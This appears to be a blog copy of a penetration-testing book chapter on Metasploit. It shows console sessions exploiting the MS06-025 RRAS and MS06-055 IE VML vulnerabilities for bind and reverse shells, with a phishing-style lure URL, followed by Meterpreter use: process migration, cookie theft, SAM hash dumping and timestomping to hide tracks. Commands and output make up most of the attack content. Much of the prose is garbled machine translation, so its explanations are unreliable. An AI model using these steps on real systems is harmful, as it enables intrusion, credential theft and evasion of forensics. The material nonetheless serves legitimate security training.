Penetration Testing and Tools

15/08/2011 21:44

Penetration Testing and Tools
Using Metasploit

This chapter shows you how to use Metasploit, launched an operation and Development

platform.

• Metasploit: the big picture

• Get the Metasploit

• Using the console to launch Metasploit exploits

• Using Metasploit to exploit client-side vulnerabilities

• Using Metasploit Meterpreter

• Use as Metasploit thief passes man in the middle

• Using the Metasploit attack self-

• Inside the Metasploit exploit modules

Metasploit: The Big Picture

Metasploit is a free download makes it easy to acquire, develop and

implementation of the exploits of vulnerabilities in software. Comes with professional quality

exploits in the hundreds of known vulnerabilities in software. When HD Moore released

Metasploit in 2003, has permanently changed the security scene. Suddenly, someone

could be a hacker, and all had access to patches and exploits

Recently patched vulnerabilities. Software vendors could no longer drag their feet down

unpublished vulnerabilities because the Metasploit crew was hard at work developing

exploits that would be released to all users Metasploit.

Metasploit was originally designed as a development platform to use, and we will use

later in the book show you how to develop exploits. However, it is probably

often used today for professionals and amateurs security as a "point, click, root," environment

to launch exploits included in the table.

We spend most of the Metasploit show examples chapter. To save space,

We strategically cut out the irrelevant text, so that the output you see while following along

can not be identical to what you see in this post. Most of the examples chapter will

from Metasploit runs on the Windows platform in the Cygwin environment.

Get Metasploit

Metasploit runs natively on Linux, BSD, Mac OS X and Windows under Cygwin. You

may enlist in the source of development to get the latest copy of the picture, or just use the installer packaged by http://framework.metasploit.com/msf/download.

Windows console application (msfconsole) that we used in this

The section requires the Cygwin environment. In the Windows package comes with a

Browser-based AJAX interface (msfweb), which is correct to use the light, but you'll

want to install Cygwin to use the Windows console. Cygwin is the downloader

www.cygwin.com / setup.exe. Be sure to install at least the following elements, as well

Basic packages:

• Development of readline, ruby, and subversion (required for msfupdate)

• Interpreters Ruby

• readline libs

• Net openssl

References

Installing Metasploit on Windows http://metasploit.com/dev/trac/wiki/Metasploit3/

InstallWindows

Installing Metasploit on Mac OS X OS http://metasploit.com/dev/trac/wiki/Metasploit3/

InstallMacOSX

Installing Metasploit Gentoo http://metasploit.com/dev/trac/wiki/Metasploit3/

InstallGentoo

Installing Metasploit on Ubuntu http://metasploit.com/dev/trac/wiki/Metasploit3/

InstallUbuntu

Installing Metasploit on Fedora http://metasploit.com/dev/trac/wiki/Metasploit3/

InstallFedora

Using the console to launch attacks Metasploit

Our first demo in the Tour de Metasploit will operate an unpatched XP Service Pack

1 machine is missing RRAS security update (MS06-025). We will try to get an external command

shell running in this table RRAS Metasploit exploit.

Metasploit can use any pair of Windows with any load Windows. Therefore, we

decides to use RRAS vulnerability to open a shell, create an administrator,

start a VNC session remotely, or to make a lot of other things. lets Start.
$ ./msfconsole
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >
The interesting commands to start with are
show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>
Other commands can be found by typing help. Our first task will be to find the name
of the RRAS exploit so we can use it:
msf > show exploits
Exploits
========
Name Description
---- -----------
...
windows/smb/ms04_011_lsass Microsoft LSASS Service
DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service
Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service
Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN
Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service
NetpwPathCanonicalize Overflow

There he is! Metasploit windows/smb/ms06_025_rras calls. We will use operational

and then go and see all the options needed to exploit the work.
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Please note that the rapid changes in input "to take advantage of the state" when it uses

form. Options or parameters when you configure the vulnerability remains

if not reset the options each time you run it. You can return to the original

beginning to return to the main console mode command.
msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Different exploits have different options. Let’s see what options need to be set to
make the RRAS exploit work.
msf exploit(ms06_025_rras) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
This exploit requires a target address, the port number SMB (server message block)
uses to listen, and the name of the pipe exposing this functionality.
msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220
As you can see, the syntax to set an option is
set <OPTION-NAME> <option>
Metasploit is often the case of option names and option,

better to use capital letters, if the option is listed in the big one. With the advantage of the set form, we

next need to define the load and the type of target. The payload is the action that occurs

Once the vulnerabilities are exploited. It 's like a choose what you want to happen as a result

exploit the vulnerability. In this first example, use a payload that simply

opens a command shell listening on a TCP port.
msf exploit(ms06_025_rras) > show payloads
Compatible payloads
===================
...
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command
Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP
Inline
...
Here we see three payloads, each of which can be used to load an order online

shell. The use of the word "online" here means that the shell is placed in a

return. The alternative is the "scene" payload, which are part of a smaller buffer, but

It also calls for the network of back and forth to configure. Due to the nature of vulnerabilities,

buffer space of the operator is a luxury and a feat on stage is a better option.

XP SP1 This machine is not running a firewall, choose a single hull sowe'll and bind

accept the default settings.
msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_025_rras) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
To exploit and payload are both set. Next, we need to set a target type. Metasploit is

some generic exploits that work on all platforms, but for others, you will need to specify a

goal of the operating system
msf exploit(ms06_025_rras) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
msf exploit(ms06_025_rras) > set TARGET 1
TARGET => 1
All set! Let’s kick off the exploit.
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[-] Exploit failed: Login Failed: The SMB server did not reply to our request
Windows XP SP1 should not require authentication for this vulnerability. The

Microsoft Security Bulletin lists XP SP1 as a challenge anonymously. Take a close

look at this exploit.
msf exploit(ms06_025_rras) > info
Name: Microsoft RRAS Service Overflow
Version: 4498
Platform: Windows
Privileged: Yes
License: Metasploit Framework License
Provided by:
Nicolas Pouvesle <nicolas.pouvesle@gmail.com>
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload information:
Space: 1104
Avoid: 1 characters
Description:

This module exploits a stack overflow in the Windows Routing and

Remote Access Service. Since the service is hosted within

svchost.exe, failed to take advantage of a company may cause other system

services to fail as well. A valid user name and password is necessary

To exploit this vulnerability on Windows 2000. When attacking XP SP1,

SMBPIPE option is set to "SRVSVC".

They exploit description claims that the attacker XP SP1 SMBPIPE opportunity

SRVSVC made. You can see our previous settings show that put SMBPIPE

the router. Before blindly following instructions, we will explore the pipes are accessible

XP SP1 on the target computer, and why it did not work ROUTER. Metasploit version

3 added several additional modules, one of which is a tool called a pipe list.

We will use this router to see if named pipe is exposed at a distance.

msf exploit(ms06_025_rras) > show auxiliary
Name Description
---- -----------
admin/backupexec/dump Veritas Backup Exec Windows Remote
File Access
admin/backupexec/registry Veritas Backup Exec Server Registry
Access
dos/freebsd/nfsd/nfsd_mount FreeBSD Remote NFS RPC Request Denial
of Service
dos/solaris/lpd/cascade_delete Solaris LPD Arbitrary File Delete
dos/windows/nat/nat_helper Microsoft Windows NAT Helper Denial
of Service
dos/windows/smb/ms05_047_pnp Microsoft Plug and Play Service
Registry Overflow
dos/windows/smb/ms06_035_mailslot Microsoft SRV.SYS Mailslot Write
Corruption
dos/windows/smb/ms06_063_trans Microsoft SRV.SYS Pipe Transaction No
Null
dos/windows/smb/rras_vls_null_deref Microsoft RRAS
InterfaceAdjustVLSPointers NULL Dereference
dos/wireless/daringphucball Apple Airport 802.11 Probe Response
Kernel Memory Corruption
dos/wireless/fakeap Wireless Fake Access Point Beacon
Flood
dos/wireless/fuzz_beacon Wireless Beacon Frame Fuzzer
dos/wireless/fuzz_proberesp Wireless Probe Response Frame Fuzzer
dos/wireless/netgear_ma521_rates NetGear MA521 Wireless Driver Long
Rates Overflow
dos/wireless/netgear_wg311pci NetGear WG311v1 Wireless Driver Long
SSID Overflow
dos/wireless/probe_resp_null_ssid Multiple Wireless Vendor NULL SSID
Probe Response
dos/wireless/wifun Wireless Test Module
recon_passive Simple Recon Module Tester
scanner/discovery/sweep_udp UDP Service Sweeper
scanner/mssql/mssql_login MSSQL Login Utility
scanner/mssql/mssql_ping MSSQL Ping Utility
scanner/scanner_batch Simple Recon Module Tester
scanner/scanner_host Simple Recon Module Tester
scanner/scanner_range Simple Recon Module Tester
scanner/smb/pipe_auditor SMB Session Pipe Auditor
scanner/smb/pipe_dcerpc_auditor SMB Session Pipe DCERPC Auditor
scanner/smb/version SMB Version Detection
test Simple Auxiliary Module Tester
test_pcap Simple Network Capture Tester
voip/sip_invite_spoof SIP Invite Spoof
Aha, there is the named pipe scanner, scanner/smb/pipe_auditor. Looks like Metasploit
3 also knows how to play with wireless drivers… Interesting... But for now, let’s keep
focused on our XP SP1 RRAS exploit by enumerating the exposed named pipes.
-----------
msf exploit(ms06_025_rras) > use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR
identifier
msf auxiliary(pipe_auditor) > set RHOSTS 192.168.1.220
RHOSTS => 192.168.1.220
msf auxiliary(pipe_auditor) > exploit
[*] Pipes: \netlogon, \lsarpc, \samr, \epmapper, \srvsvc, \wkssvc
[*] Auxiliary module execution completed
The exploit description turns out to be correct. The ROUTER named pipe either does
not exist on XP SP1 or is not exposed anonymously. \srvsvc is in the list, however, so
we’ll instead target the RRAS RPC interface over the \srvsvc named pipe.
msf auxiliary(pipe_auditor) > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[*] Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Bound to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Getting OS...
[*] Calling the vulnerable function on Windows XP...
[*] Command shell session 1 opened (192.168.1.113:2347 -> 192.168.1.220:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\SAFE_NT\system32>echo w00t!
echo w00t!
w00t!
D:\SAFE_NT\system32>
It worked!We can verify the connection on a separate command prompt from a local
high port to the remote port 4444 using netstat.
C:\tools>netstat -an | findstr .220 | findstr ESTAB
TCP 192.168.1.113:3999 192.168.1.220:4444 ESTABLISHED
Let’s go back in using the same exploit but instead swap in a payload that connects back
from the remote system to the local attack workstation for the command shell. Subsequent
exploit attempts for this specific vulnerability might require a reboot of the target.
msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_025_rras) > show options
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
The reverse shell payload has a new required option. You’ll need to pass in the IP
address of the local host (LHOST) attacking workstation to which you’d like the victim
to reach back.
msf exploit(ms06_025_rras) > set LHOST 192.168.1.113
LHOST => 192.168.1.113
msf exploit(ms06_025_rras) > exploit
[*] Started reverse handler
[-] Exploit failed: Login Failed: The SMB server did not reply to our request
msf exploit(ms06_025_rras) > exploit
[*] Started reverse handler
[*] Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Bound to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Getting OS...
[*] Calling the vulnerable function on Windows XP...
[*] Command shell session 3 opened (192.168.1.113:4444 -> 192.168.1.220:1034)
[-] Exploit failed: The SMB server did not reply to our request
msf exploit(ms06_025_rras) >
This demo presents some interesting behavior Metasploit you may encounter

so let's discuss what happened. The first attempted exploit was not able to successfully

take RRAS RPC. Metasploit reported in this condition, the failure of login.

The interface is exposed on an anonymous tip called accessible, so that the error message

Red Herring is one that does not attempt to authenticate. It is more likely that the connection

waiting time or the Windows layer or the layer of Metasploit.

So we try to operate again. This attempt all the way through the achievement

and also set up a command interpreter (Session # 3). Metasploit seems out

We just before returning control of the session to the console, though. This idea of ​​sessions

Metasploit 3 is a new feature and help us in this case. Although we returned to the MSF, we have a shell prompt, waiting for us. You can use the

each session with the active-control sessions.
msf exploit(ms06_025_rras) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.1.113:4444 -> 192.168.1.220:1034
 It’s still there! To interact with the session, use the sessions –i <id> command.
msf exploit(ms06_025_rras) > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\SAFE_NT\system32>
Back in business! There was no point to move from shell to bind to the

Vice versa, in the case of two machines on the same network without firewall involved.

But imagine if you were a bad guy trying to sneak a connection of a compromise

network without attracting attention. In this case, more could be done

sense to use an inversion must LPORT set to 443 and hopes to pose as a normal

HTTPS connection through a proxy server. Metasploit can wrap the payload

within a normal-looking HTTP conversation, so it may pass under the radar.

Now you know the most important commands of the Metasploit console and understand

the process of basic attack. Let us explore other ways to use Metasploit to launch an attack.

References

Microsoft Security Bulletin RRAS www.microsoft.com/technet/security/bulletin/

MS06-025.mspx

Metasploit exploits and charges http://metasploit.com:55555/EXPLOITS

http://metasploit.com:55555/PAYLOADS

Exploit client-side vulnerabilities

with Metasploit

Fortunately, unpatched Windows XP SP1 workstation in the previous example with

no firewall protection on the local subnet, not much in the real world.

Interesting targets are usually protected from the perimeter, or host-based firewall. As

However, hackers are always adapt to these changing conditions, with new attacks.

Chapter 16 goes into detail the rise of client-side vulnerabilities as well as the use of

tools to help you find them. As a quick overview of client side vulnerabilities are vulnerabilities

client software, such as web browsers, email clients and media players.
The idea is to lure the victim to a malicious Web site or open a malicious

file or email. When the victim interacts with the pirates of controlled content,

An attacker can be found in the data that triggers the vulnerability of the client-side applications to analyze

content. One good thing (from the viewpoint of an attacker) is that the connections are initiated

the victim and go straight through the firewall.

Metasploit includes several exploits for browser-based vulnerabilities and can act as a

Rogue Web server to host these vulnerabilities. In the following example we'll use Metasploit

hosting an exploit for the vulnerability of Internet Explorer VML analysis set by Microsoft

with security update MS06-055.

msf > show exploits
Exploits
========
Name Description
---- -----------
...
windows/browser/aim_goaway AOL Instant Messenger goaway
Overflow
windows/browser/apple_itunes_playlist Apple ITunes 4.7 Playlist
Buffer Overflow
windows/browser/apple_quicktime_rtsp Apple QuickTime 7.1.3 RTSP URI
Buffer Overflow
windows/browser/ie_createobject Internet Explorer COM
CreateObject Code Execution
windows/browser/ie_iscomponentinstalled Internet Explorer
isComponentInstalled Overflow
windows/browser/mcafee_mcsubmgr_vsprintf McAfee Subscription Manager
Stack Overflow
windows/browser/mirc_irc_url mIRC IRC URL Buffer Overflow
windows/browser/ms03_020_ie_objecttype MS03-020 Internet Explorer
Object Type
windows/browser/ms06_001_wmf_setabortproc Windows XP/2003/Vista Metafile
Escape() SetAbortProc Code Execution
windows/browser/ms06_013_createtextrange Internet Explorer
createTextRange() Code Execution
windows/browser/ms06_055_vml_method Internet Explorer VML Fill
Method Code Execution
windows/browser/ms06_057_webview_setslice Internet Explorer
WebViewFolderIcon setSlice() Overflow
...
As you can see, there are several browser-based exploits built into Metasploit:
msf > use windows/browser/ms06_055_vml_method
msf exploit(ms06_055_vml_method) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.113 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit
(default

Browser-based vulnerabilities, Metasploit is a new opportunity, URIPATH. Metasploit

act as a web server (in this case, http://192.168.1.113:8080) to URIPATH

is another URL where you can attract to your victim. In this example, pretend that

We will send an e-mail looks like this:

"Dear [victim] Congratulations, you won one million U.S. dollars! For pickup

instructions, click here: [link] "

A good URL for this kind of attack could be something like http://192.168.1.113:8080/

you_win.htm.

msf exploit(ms06_055_vml_method) > set URIPATH you_win.htm
URIPATH => you_win.htm
msf exploit(ms06_055_vml_method) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_055_vml_method) > set LHOST 192.168.1.113
LHOST => 192.168.1.113
msf exploit(ms06_055_vml_method) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.113 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH you_win.htm no The URI to use for this exploit
(default is random)
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST 192.168.1.113 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows NT 4.0 -> Windows 2003 SP1
msf exploit(ms06_055_vml_method) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.113:8080/you_win.htm
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
Metasploit is waiting for incoming connections on port 8080 requiring

you_win.htm. When HTTP connections arriving on this channel, Metasploit present

VML exploit reverse shell payload instructs Internet Explorer to start

Back to 192.168.1.113 connection with a destination port of 4444. Let's see what happens when a workstation missing Microsoft security update MS06-055 visits the malicious

website.

[*] Command shell session 4 opened (192.168.1.113:4444 -> 192.168.1.220:1044)
Aha! We have our first victim!
msf exploit(ms06_055_vml_method) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
4 Command shell 192.168.1.113:4444 -> 192.168.1.220:1044
msf exploit(ms06_055_vml_method) > sessions -i 4
[*] Starting interaction with 4...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\SAFE_NT\Profiles\jness\Desktop>echo woot!
echo woot!
woot!
D:\SAFE_NT\Profiles\jness\Desktop>
Pressing CTRL-Z will return you from the session back to the Metasploit console
prompt. Let’s simulate a second incoming connection:
msf exploit(ms06_055_vml_method) > [*] Command shell session 5 opened
(192.168.1.113:4444 -> 192.168.1.230:1159)
sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
4 Command shell 192.168.1.113:4444 -> 192.168.1.220:1044
5 Command shell 192.168.1.113:4444 -> 192.168.1.230:1159
The jobs command will list the exploit jobs you have going on currently:
msf exploit(ms06_055_vml_method) > jobs
Id Name
-- ----
3 Exploit: windows/browser/ms06_055_vml_method
msf exploit(ms06_055_vml_method) > jobs -K
Stopping all jobs...
Exploiting client-side vulnerabilities by using Metasploit’s built-in web server will
allow you to attack workstations protected by a firewall. Let’s continue exploring
Metasploit by looking at other payload types.

Use Meterpreter

For an order is large. But sometimes it would be more convenient

to have greater flexibility after compromising a host. And in some situations,

need to be so devious that even the creation of a new process in a host may be too

noise. There payload Meterpreter shines!

The Meterpreter Metasploit is a shell of payload that is injected into the

good memories and provide a full-featured and expandable

the attacker. This payload will never really a victim of the host Member State hits the disc, everything is

injected into the process memory and no additional process is created. It also provides

coherent set of functions, regardless of the platform used. It is Meterpreter

very extensible, allowing you to load new functions on the fly by downloading the DLL file

Memory of the target system.

In this example we are using the VML exploit based browser, but the supply of Meterpreter

payload.

msf exploit(ms06_055_vml_method) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms06_055_vml_method) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.112 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH you_win.htm no The URI to use for this exploit
(default is random)
Payload options:
Name Current Setting Required Description
---- --------------- -------- ------------
DLL ...metsrv.dll yes The local path to the DLL
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST 192.168.1.112 yes The local address
LPORT 4444 yes The local port
msf exploit(ms06_055_vml_method) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.112:8080/you_win.htm
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > [*] Transmitting intermediate stager for
over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.220:1038)
msf exploit(ms06_055_vml_method) >

The VML exploit worked flawlessly again. Let’s check our session:
msf exploit(ms06_055_vml_method) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.112:4444 -> 192.168.1.220:1038
msf exploit(ms06_055_vml_method) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
The help command will list all the built-in Meterpreter commands.
Core Commands
=============
Command Description
------- -----------
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getwd Print working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory
Stdapi: Networking Commands
-----------------------------
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components
Ways to use Metasploit Meterpreter could probably fill a book, we

has much room to explore here. But we will recall some useful tips for

You started playing with it.

If you have tried the browser vulnerabilities, you may have noticed the Busted

Internet Explorer window on the desktop of the victim after each attempt to exploit. In addition,

Due to the use of spray-job style, this session of IE uses several hundred

megabytes of memory. The victim probably clever attempt to close Internet Explorer or killing

Task Manager. If you want to stay the workstation of the victims, not iexplore.exe

a good home for long-term Meterpreter your session. Fortunately, it Meterpreter

is easy to migrate to a process that will last longer.

meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
...
280 Explorer.EXE D:\SAFE_NT\Explorer.EXE
1388 IEXPLORE.EXE D:\Program Files\Internet Explorer\IEXPLORE.EXE
...
meterpreter > migrate 280
[*] Migrating to 280...
[*] Migration completed successfully.

In the preceding example, we have migrated our Meterpreter session to the Explorer
process of the current logon session. Now with a more resilient host process, let’s introduce
a few other Meterpreter commands. Here’s something the command prompt cannot
do—upload and download files:
meterpreter > upload c:\\jness\\run.bat c:\\
[*] uploading : c:\jness\run.bat -> c:\
[*] uploaded : c:\jness\run.bat -> c:\\\jness\run.bat
meterpreter > download -r d:\\safe_nt\\profiles\\jness\\cookies c:\\jness
[*] downloading: d:\safe_nt\profiles\jness\cookies\index.dat ->
c:\jness/index.dat
[*] downloaded : d:\safe_nt\profiles\jness\cookies\index.dat ->
c:\jness/index.dat
[*] downloading: d:\safe_nt\profiles\jness\cookies\jness@dell[1].txt ->
c:\jness/jness@dell[1].txt
[*] downloaded : d:\safe_nt\profiles\jness\cookies\jness@dell[1].txt ->
c:\jness/jness@dell[1].txt
[*] downloading: d:\safe_nt\profiles\jness\cookies\jness@google[1].txt ->
c:\jness/jness@google[1].txt
...
Other highlights of the Meterpreter include support for:
• Stopping and starting the keyboard and mouse of the user’s logon session (fun!)
• Listing, stopping, and starting processes
• Shutting down or rebooting the machine
• Enumerating, creating, deleting, and setting registry keys
• Turning the workstation into a traffic router, especially handy on dual-homed
machines bridging one public network to another “private” network
• Complete Ruby scripting environment enabling limitless possibilities
If you find yourself with administrative privileges on a compromised machine, you
can also add the privileged extension:
meterpreter > use priv
Loading extension priv...success.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Hashdump command works as pwdump, which allows you to dump the SAM database.

Stomp time allows hackers to cover their tracks by setting the modification, consulted

Timestamps created and executed for any value they want.

meterpreter > hashdump
Administrator:500:eaace295a6e641a596729d810977XXXX:79f8374fc0fd00661426122572
6eXXXX:::
ASPNET:1003:e93aacf33777f52185f81593e52eXXXX:da41047abd5fc41097247f5e40f9XXXX
:::
grayhat:1007:765907f21bd3ca373a26913ebaa7ce6c:821f4bb597801ef3e18aba022cdce17
d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:3ec83e2fa53db18f5dd0c5fd34428744:c0ad810e786ac606f04407815
4ffa5c5:::
\SAFE_NT;D:\SAF;:1002:aad3b435b51404eeaad3b435b51404ee:8c44ef4465d0704b3c99418
c8d7ecf51:::
meterpreter > timestomp
Usage: timestomp file_path OPTIONS
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
When you’re looking for flexibility, the Meterpreter payload delivers!
Using Metasploit as Man-in-the-Middle

Password Stealer

We used Metasploit as a Web server to host the malicious VML exploit lure early

innocent victims, and to exploit unpatched. It is more Metasploit

not only malicious HTTP server functionality. They are actually implemented

a perfect custom server SMB. This allows an attack very interesting. But first, background information

on passwords hashes
--------------------------------------------------------------------------------------------To Be Countinued.